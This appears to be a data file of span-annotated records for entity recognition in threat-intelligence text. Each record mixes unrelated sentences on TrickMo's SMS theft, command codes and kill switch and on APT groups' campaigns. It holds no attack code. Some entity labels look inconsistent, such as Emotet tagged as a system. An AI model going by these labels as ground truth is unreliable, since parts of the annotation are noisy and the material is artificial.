According to Wikipedia , the CSS was formed in 1972 to integrate the NSA and the Service Cryptologic Elements ( SCE ) of the U.S armed forces . In addition to Helminth , the ISMDoor implant is likely used by the Iran-based adversary to attack targets particularly those in the Middle East region .", "spans": [{"start": 2, "end": 9, "label": "Malware"}, {"start": 300, "end": 308, "label": "Malware"}, {"start": 315, "end": 322, "label": "Malware"}]} {"text": "As an example , in the two images below , we can see the encrypted and decrypted shared preferences file , which is encrypted using the java \u201c PBEWithMD5AndDES \u201d algorithm . The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure .", "spans": [{"start": 218, "end": 250, "label": "Malware"}, {"start": 421, "end": 433, "label": "Organization"}, {"start": 445, "end": 451, "label": "System"}, {"start": 473, "end": 483, "label": "Malware"}, {"start": 523, "end": 525, "label": "System"}]} {"text": "C & C Communications Exfiltrating Device Data To communicate with its master , TrickMo \u2019 s code contains a hardcoded URL of the C & C server . Emotet is a type of general-purpose malware that evolved from a well-known banking Trojan , \" Cridex \" , which was first discovered in 2014 . 
During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East \u2014 of note , targets appeared to be located in Bahrain and Kuwait .", "spans": [{"start": 79, "end": 86, "label": "Malware"}, {"start": 143, "end": 149, "label": "System"}, {"start": 218, "end": 232, "label": "System"}, {"start": 237, "end": 243, "label": "System"}, {"start": 313, "end": 332, "label": "Organization"}]} {"text": "When it runs , it periodically connects to its designated server via an unencrypted HTTP request and sends over a JSON object that contains data gleaned from the victim \u2019 s phone . It seems that the main objective of the attackers was information gathering from the infected computers . ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine .", "spans": [{"start": 287, "end": 294, "label": "Malware"}]} {"text": "The stolen parameters follow : ID IMSI IMEI Phone number Operator AID Model Brand Version Build Battery percentage Wi-Fi connection state Wake time Are logs enabled ? Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . In early November 2018 , CrowdStrike observed activity from the HELIX KITTEN adversary at a customer in the telecommunications vertical .", "spans": [{"start": 299, "end": 308, "label": "Organization"}, {"start": 313, "end": 321, "label": "Organization"}, {"start": 357, "end": 368, "label": "Organization"}, {"start": 396, "end": 408, "label": "Organization"}, {"start": 440, "end": 458, "label": "Organization"}]} {"text": "Is the malware already set as the default SMS application ? Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . 
The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 148, "end": 156, "label": "Organization"}, {"start": 190, "end": 197, "label": "Organization"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 215, "end": 221, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 289, "end": 295, "label": "System"}, {"start": 321, "end": 330, "label": "Indicator"}, {"start": 334, "end": 373, "label": "Organization"}]} {"text": "[ True/False ] Signal strength Screen active [ True/False ] Orientation Was accessibility permission granted ? In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": [{"start": 134, "end": 139, "label": "Organization"}, {"start": 168, "end": 192, "label": "System"}, {"start": 204, "end": 222, "label": "Organization"}, {"start": 351, "end": 365, "label": "Organization"}, {"start": 387, "end": 393, "label": "System"}, {"start": 405, "end": 426, "label": "Indicator"}, {"start": 450, "end": 455, "label": "Organization"}]} {"text": "[ True/False ] Screen size List of the installed applications SMS messages saved on the device It is not uncommon for banking malware to harvest extensive amounts of data from the victim \u2019 s device . The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware . 
Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution .", "spans": [{"start": 204, "end": 209, "label": "Organization"}, {"start": 244, "end": 269, "label": "System"}, {"start": 332, "end": 338, "label": "Organization"}, {"start": 357, "end": 372, "label": "Malware"}, {"start": 421, "end": 445, "label": "Organization"}, {"start": 463, "end": 472, "label": "Organization"}, {"start": 481, "end": 504, "label": "Organization"}]} {"text": "The collected data can then be used to generate a unique identifier of the bot or for monetization purposes . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER .", "spans": [{"start": 110, "end": 120, "label": "Organization"}, {"start": 146, "end": 170, "label": "Vulnerability"}, {"start": 233, "end": 240, "label": "Organization"}, {"start": 250, "end": 256, "label": "Organization"}, {"start": 269, "end": 292, "label": "Organization"}, {"start": 314, "end": 320, "label": "System"}, {"start": 356, "end": 362, "label": "Malware"}, {"start": 372, "end": 383, "label": "Malware"}]} {"text": "It can also be sold on the dark web and used in various spoofing attacks . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . 
The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis .", "spans": [{"start": 106, "end": 130, "label": "Vulnerability"}, {"start": 180, "end": 192, "label": "Organization"}, {"start": 316, "end": 337, "label": "Organization"}, {"start": 342, "end": 352, "label": "Organization"}]} {"text": "For example , since some banks use anti-fraud solutions that only check device fingerprinting , fraudsters can use the collected information to perform fraudulent transactions from a device that mimics that same fingerprint . The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization .", "spans": [{"start": 230, "end": 247, "label": "Organization"}, {"start": 346, "end": 357, "label": "Malware"}, {"start": 363, "end": 386, "label": "Malware"}, {"start": 407, "end": 414, "label": "Organization"}, {"start": 443, "end": 449, "label": "Organization"}, {"start": 486, "end": 511, "label": "Organization"}]} {"text": "Stealing and Concealing SMS Messages As some banks still use SMS-based transaction authorization , TrickMo is configured to automatically steal all SMS messages that are stored on the device . Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia . 
During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications .", "spans": [{"start": 99, "end": 106, "label": "Malware"}, {"start": 208, "end": 214, "label": "Organization"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 284, "end": 294, "label": "Organization"}, {"start": 378, "end": 404, "label": "Organization"}, {"start": 407, "end": 425, "label": "Organization"}, {"start": 428, "end": 449, "label": "Organization"}, {"start": 452, "end": 475, "label": "Organization"}, {"start": 482, "end": 509, "label": "Organization"}, {"start": 564, "end": 571, "label": "Organization"}, {"start": 622, "end": 632, "label": "Organization"}, {"start": 670, "end": 681, "label": "Malware"}, {"start": 682, "end": 689, "label": "Malware"}, {"start": 753, "end": 766, "label": "Malware"}, {"start": 784, "end": 786, "label": "System"}]} {"text": "Once in a while , it sends a packet to its C & C server containing the collected device data along with all the saved SMS messages . LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once . The email had no subject and what initially drew our attention to OilRig 's attack was the content of the spear phishing email .", "spans": [{"start": 133, "end": 140, "label": "Organization"}, {"start": 202, "end": 236, "label": "System"}, {"start": 251, "end": 268, "label": "System"}, {"start": 431, "end": 437, "label": "Organization"}]} {"text": "Since it can use the accessibility service to become the default SMS app , it can also delete the SMS messages so only the attackers can see them . 
PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages . As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East .", "spans": [{"start": 148, "end": 156, "label": "Organization"}, {"start": 283, "end": 291, "label": "Organization"}, {"start": 319, "end": 325, "label": "Organization"}]} {"text": "In the image below , we can see a packet that was sent to the attacker \u2019 s C & C containing collected information along with stolen SMS data . PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers . First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims .", "spans": [{"start": 143, "end": 151, "label": "Organization"}, {"start": 179, "end": 205, "label": "System"}]} {"text": "A Communication Channel via Stolen SMS In addition , TrickMo has an automatic mechanism to send SMS messages to its C & C server . The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations . According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry .", "spans": [{"start": 53, "end": 60, "label": "Malware"}, {"start": 284, "end": 298, "label": "Organization"}, {"start": 341, "end": 346, "label": "Organization"}, {"start": 463, "end": 471, "label": "Organization"}, {"start": 569, "end": 588, "label": "Organization"}]} {"text": "In some cases , it uses this mechanism to send log data of important actions . 
PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 130, "end": 142, "label": "System"}, {"start": 314, "end": 331, "label": "Organization"}, {"start": 386, "end": 400, "label": "Indicator"}]} {"text": "It can save an SMS message on the device , marking with \u201c internal \u201d in the phone number field . The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia\u2014PLATINUM is known to customize tools based on the network architecture of targeted organizations . Sowbug 's next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": [{"start": 314, "end": 320, "label": "Organization"}, {"start": 434, "end": 451, "label": "Organization"}, {"start": 506, "end": 520, "label": "Indicator"}]} {"text": "The SMS message will be instantly sent to the server , informing the malware operator of executed tasks . The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way . 
For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": [{"start": 110, "end": 123, "label": "System"}, {"start": 158, "end": 165, "label": "System"}, {"start": 257, "end": 263, "label": "Organization"}, {"start": 316, "end": 333, "label": "Malware"}, {"start": 393, "end": 405, "label": "Indicator"}, {"start": 409, "end": 428, "label": "Indicator"}]} {"text": "In the image below , we see a log TrickMo sent to the attacker upon becoming the default SMS app . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives . In this case , the attackers maintained a presence on the target 's network for nearly six months between September 2016 and March 2017 .", "spans": [{"start": 34, "end": 41, "label": "Malware"}, {"start": 103, "end": 117, "label": "Organization"}, {"start": 287, "end": 297, "label": "Organization"}]} {"text": "If the malware successfully became the default SMS app , it sends the words \u201c the app has been replaced \u201d in Russian . This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . 
In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) .", "spans": [{"start": 285, "end": 294, "label": "Organization"}, {"start": 299, "end": 323, "label": "Organization"}, {"start": 369, "end": 377, "label": "Malware"}, {"start": 414, "end": 424, "label": "Malware"}, {"start": 439, "end": 447, "label": "Organization"}, {"start": 451, "end": 468, "label": "Malware"}]} {"text": "If the original SMS app has been restored , it will send \u201c the app returned to its original place. \u201d Controlling TrickMo TrickMo \u2019 s operators can control the malware via two channels : Through its C & C via a plaintext HTTP protocol using JSON objects Through encrypted SMS messages There are predefined commands to change the malware \u2019 s configuration and make it execute certain tasks . PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . 
Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": [{"start": 113, "end": 120, "label": "Malware"}, {"start": 121, "end": 128, "label": "Malware"}, {"start": 390, "end": 402, "label": "Organization"}, {"start": 429, "end": 434, "label": "Organization"}, {"start": 496, "end": 506, "label": "Organization"}, {"start": 509, "end": 516, "label": "Organization"}, {"start": 519, "end": 527, "label": "Organization"}, {"start": 534, "end": 552, "label": "Organization"}, {"start": 607, "end": 617, "label": "Organization"}, {"start": 631, "end": 640, "label": "Organization"}, {"start": 645, "end": 665, "label": "Organization"}, {"start": 668, "end": 676, "label": "Organization"}, {"start": 699, "end": 715, "label": "Indicator"}, {"start": 728, "end": 743, "label": "Indicator"}, {"start": 746, "end": 763, "label": "Indicator"}, {"start": 770, "end": 785, "label": "Indicator"}]} {"text": "Some of the more interesting commands include : SMS Control Update the address of the C & C server \u2014 SMS starting with \u201c http : // \u201d Send AES-encrypted SMS message back to sender \u2014 SMS starting with \u201c sms : // \u201d Update service wake-up interval \u2014 \u201c 2 \u201d Kill switch \u2014 \u201c 4 \u201d C & C Control Update the address of the C & C server \u2014 \u201c 1 \u201d Update service wake-up interval \u2014 \u201c 2 \u201d Lock the screen \u2014 \u201c 5 \u201d Display a picture in a WebView from an arbitrary URL \u2014 \u201c 11 \u201d Send an arbitrary SMS message \u2014 \u201c 8 \u201d Steal images But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money . 
Additionally , Starloader was also observed deploying additional tools used by the attackers , such as credential dumpers and keyloggers .", "spans": [{"start": 670, "end": 680, "label": "Malware"}, {"start": 758, "end": 776, "label": "Malware"}, {"start": 781, "end": 791, "label": "Malware"}]} {"text": "saved on the device \u2014 \u201c 12 \u201d and \u201c 13 \u201d Use the accessibility service to become the default SMS app \u2014 \u201c 6 \u201d Enable recording of other apps \u2014 \u201c 15 \u201d Kill switch \u2014 \u201c 4 \u201d The Lockdown Screen Most thieves don \u2019 t want to be caught red-handed as they steal \u2014 they want to buy some time to get away with the loot . However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft . ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 .", "spans": [{"start": 319, "end": 322, "label": "Organization"}, {"start": 347, "end": 358, "label": "Organization"}, {"start": 489, "end": 494, "label": "Organization"}, {"start": 608, "end": 629, "label": "Organization"}]} {"text": "The same is true for banking malware . The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time . 
Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access .", "spans": [{"start": 133, "end": 142, "label": "System"}, {"start": 291, "end": 300, "label": "Organization"}, {"start": 304, "end": 327, "label": "System"}, {"start": 330, "end": 333, "label": "System"}]} {"text": "Desktop banking malware often blocks the user \u2019 s access to their banking website after a successful transaction by using web injects that show a variety of \u201c service unavailable \u201d screens . Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization . The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks .", "spans": [{"start": 250, "end": 263, "label": "Organization"}, {"start": 410, "end": 416, "label": "Malware"}, {"start": 419, "end": 434, "label": "Malware"}]} {"text": "TrickMo is no different ; the goal is to complete the operation while raising minimal suspicion . Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands . Strider has been active since at least October 2011 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 236, "end": 243, "label": "Organization"}]} {"text": "After performing a fraudulent action , stealing the OTP/mTAN , TrickMo buys some time by activating the lock screen and preventing the user from accessing their device . The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function . 
Lua modules is a technique that has previously been used by Flamer .", "spans": [{"start": 63, "end": 70, "label": "Malware"}, {"start": 174, "end": 188, "label": "System"}, {"start": 365, "end": 376, "label": "Malware"}]} {"text": "This lockdown screen includes two parts : A WebView containing a background picture loaded from a predefined URL . Instead , OurMine had managed to alter WikiLeaks 's DNS records ( held by a third-party registrar ) to direct anyone who tried to visit wikileaks.org to visit a different IP address which definitely wasn't under the control of Julian Assange and his cronies . The Remsec malware used by Strider has a modular design .", "spans": [{"start": 125, "end": 132, "label": "Organization"}, {"start": 154, "end": 163, "label": "Organization"}, {"start": 379, "end": 385, "label": "Malware"}, {"start": 386, "end": 393, "label": "Malware"}, {"start": 402, "end": 409, "label": "Organization"}]} {"text": "This background image likely contains a fake \u201c software update \u201d screen . Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services .", "spans": [{"start": 142, "end": 151, "label": "Organization"}, {"start": 155, "end": 167, "label": "Organization"}, {"start": 451, "end": 472, "label": "Organization"}]} {"text": "A lockdown activity , which is a transparent window shown at the top of the screen that contains a \u201c loading \u201d cursor . Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . 
The group 's targets include a number of organizations and individuals located in Russia .", "spans": [{"start": 194, "end": 203, "label": "Organization"}, {"start": 207, "end": 219, "label": "Organization"}]} {"text": "This screen persists on the screen and prevents the user from using the navigation buttons . The group 's primary goal is demonstrating to companies that they have weak security . Remsec uses a Lua interpreter to run Lua modules which perform various functions .", "spans": [{"start": 180, "end": 186, "label": "Malware"}, {"start": 194, "end": 209, "label": "Malware"}, {"start": 217, "end": 228, "label": "Malware"}]} {"text": "Due to TrickMo \u2019 s persistence implementation mentioned earlier , this lockdown screen persists after a restart and is re-initiated every time the device becomes interactive . The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines . Russia .", "spans": [{"start": 7, "end": 14, "label": "Malware"}]} {"text": "In some cases , TrickMo may use this feature to intercept SMS messages without the knowledge of the user by activating the lockdown screen and intercepting SMS messages in the background . It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 479, "end": 486, "label": "Indicator"}]} {"text": "Application Recording \u2014 Stealing OTPs and TANs The feature that makes TrickMo different from standard SMS stealers is its unique ability to record the screen when targeted apps are running . 
The tool then starts a new web browser instance on the attacker\u2019s system and submits credentials on the real VPN portal . the group 's targets include an organization in Sweden .", "spans": [{"start": 70, "end": 77, "label": "Malware"}, {"start": 246, "end": 256, "label": "Organization"}]} {"text": "This feature was enabled only in newer versions of TrickMo that were tailored specifically for German banks and use a special application for implementing TAN-based 2FA . The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . the group 's targets include an embassy in Belgium .", "spans": [{"start": 51, "end": 58, "label": "Malware"}, {"start": 258, "end": 275, "label": "System"}, {"start": 359, "end": 366, "label": "Organization"}]} {"text": "The application recording is implemented via two methods : Using the Android MediaRecorder class to capture a video of the screen when the targeted application is presented to the user Using the accessibility service to save a text file containing the data of all the objects on the screen Both files are later sent to the C & C server of the attacker . First , the attacker\u2019s mission is to disrupt an operational process rather than steal data . Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers .", "spans": [{"start": 69, "end": 76, "label": "System"}, {"start": 366, "end": 376, "label": "Organization"}, {"start": 447, "end": 455, "label": "Organization"}, {"start": 489, "end": 503, "label": "Malware"}, {"start": 560, "end": 567, "label": "Organization"}]} {"text": "In the following image , we can see how the malware receives a JSON object from the C & C server containing the command to start recording , the targeted apps and the recorded video size ratio . 
Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics . Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" .", "spans": [{"start": 342, "end": 355, "label": "Organization"}, {"start": 464, "end": 477, "label": "Malware"}, {"start": 496, "end": 503, "label": "Organization"}]} {"text": "In the image below , the function recursively collects all the text data from the child nodes of each accessibility node . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . In September 2015 , our anti-targeted attack technologies caught a previously unknown attack .", "spans": [{"start": 127, "end": 142, "label": "Organization"}, {"start": 173, "end": 204, "label": "Organization"}, {"start": 207, "end": 210, "label": "Organization"}, {"start": 255, "end": 258, "label": "Organization"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 415, "end": 425, "label": "Organization"}]} {"text": "In other words , it goes through every object on the screen and saves its text data . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . 
Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 .", "spans": [{"start": 90, "end": 95, "label": "Organization"}, {"start": 245, "end": 253, "label": "Organization"}, {"start": 258, "end": 268, "label": "Organization"}]} {"text": "A TrickMo Kill Switch One of the most interesting features of the TrickMo malware is having its own kill switch . Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia . After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server .", "spans": [{"start": 2, "end": 9, "label": "Malware"}, {"start": 66, "end": 81, "label": "Malware"}, {"start": 122, "end": 134, "label": "Organization"}, {"start": 137, "end": 144, "label": "Organization"}, {"start": 151, "end": 158, "label": "Organization"}, {"start": 364, "end": 366, "label": "Indicator"}, {"start": 373, "end": 386, "label": "Malware"}, {"start": 457, "end": 470, "label": "Malware"}, {"start": 507, "end": 510, "label": "System"}]} {"text": "Kill switches are used by many malware authors to remove traces from a device after a successful operation . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . 
In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable .", "spans": [{"start": 109, "end": 114, "label": "Organization"}, {"start": 155, "end": 174, "label": "Vulnerability"}, {"start": 183, "end": 199, "label": "System"}, {"start": 200, "end": 209, "label": "System"}, {"start": 316, "end": 329, "label": "Malware"}, {"start": 339, "end": 356, "label": "Malware"}]} {"text": "Since TrickMo \u2019 s HTTP traffic with its C & C server is not encrypted , it can easily be tampered with . This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple Exfiltration methods .", "spans": [{"start": 18, "end": 22, "label": "Indicator"}, {"start": 150, "end": 158, "label": "System"}, {"start": 161, "end": 171, "label": "System"}, {"start": 174, "end": 183, "label": "System"}, {"start": 186, "end": 194, "label": "System"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 267, "end": 287, "label": "Organization"}, {"start": 476, "end": 489, "label": "Malware"}]} {"text": "In the following image , we can see the function that parses the commands from the C & C server . 
The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network .", "spans": [{"start": 102, "end": 107, "label": "Organization"}, {"start": 162, "end": 182, "label": "Organization"}, {"start": 367, "end": 380, "label": "Organization"}, {"start": 425, "end": 450, "label": "Indicator"}, {"start": 456, "end": 479, "label": "Organization"}]} {"text": "If the returned JSON object has the \u201c 4 \u201d key , it will turn on the kill switch and initiate its own removal by sending an intent and seamlessly confirming the uninstall using the accessibility service , all without the victim ever noticing anything . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": [{"start": 364, "end": 369, "label": "Organization"}, {"start": 533, "end": 541, "label": "Organization"}, {"start": 612, "end": 620, "label": "Organization"}, {"start": 723, "end": 732, "label": "Organization"}]} {"text": "The kill switch can also be turned on by SMS . APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . 
Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks .", "spans": [{"start": 47, "end": 52, "label": "Organization"}, {"start": 216, "end": 224, "label": "Organization"}, {"start": 290, "end": 311, "label": "Malware"}]} {"text": "This is a bit more complicated since the SMS commands are encrypted and encoded with base64 . APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet . activity originated from three separate IP addresses , all located in Chengdu , China .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 161, "end": 179, "label": "Organization"}, {"start": 369, "end": 371, "label": "Indicator"}]} {"text": "The encryption algorithm used is RSA , and interestingly , the authors chose to use the private key for decryption and leave it in the code as a hardcoded string . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . We don't know the exact date Suckfly stole the certificates from the South Korean organizations .", "spans": [{"start": 164, "end": 169, "label": "Organization"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 254, "end": 262, "label": "Organization"}, {"start": 339, "end": 347, "label": "Organization"}]} {"text": "The image below shows the function that parses the SMS messages , decrypts them using the hardcoded RSA private key and executes the commands . 
APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . stolen certificates being used maliciously occurred in early 2014 .", "spans": [{"start": 144, "end": 149, "label": "Organization"}, {"start": 162, "end": 170, "label": "Organization"}, {"start": 284, "end": 292, "label": "Organization"}, {"start": 328, "end": 336, "label": "Organization"}]} {"text": "Having analyzed a few variants of the malware , we noticed that the private key was exposed in the code and did not change . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . Symantec detects this threat as Backdoor.Nidiran .", "spans": [{"start": 145, "end": 150, "label": "Organization"}, {"start": 170, "end": 183, "label": "System"}, {"start": 403, "end": 411, "label": "Organization"}, {"start": 435, "end": 451, "label": "Indicator"}]} {"text": "Therefore , our team managed to generate the public key and craft an SMS message that activated the kill switch . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . 
Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 319, "end": 326, "label": "Vulnerability"}, {"start": 335, "end": 378, "label": "System"}, {"start": 395, "end": 408, "label": "Vulnerability"}, {"start": 448, "end": 457, "label": "Organization"}, {"start": 458, "end": 465, "label": "System"}]} {"text": "This means that the malware can be remotely eliminated by an SMS message . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The threat then executes \" svchost.exe \" .", "spans": [{"start": 127, "end": 132, "label": "Organization"}, {"start": 224, "end": 235, "label": "Malware"}]} {"text": "Our team was also able to test other commands in the lab either by tampering with the HTTP traffic from the C & C or by sending crafted SMS messages . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": [{"start": 151, "end": 156, "label": "Organization"}, {"start": 197, "end": 216, "label": "Organization"}, {"start": 272, "end": 294, "label": "Organization"}, {"start": 337, "end": 349, "label": "Organization"}, {"start": 392, "end": 407, "label": "Indicator"}, {"start": 439, "end": 456, "label": "Malware"}, {"start": 470, "end": 488, "label": "Malware"}]} {"text": "Suspect You \u2019 re Infected ? 
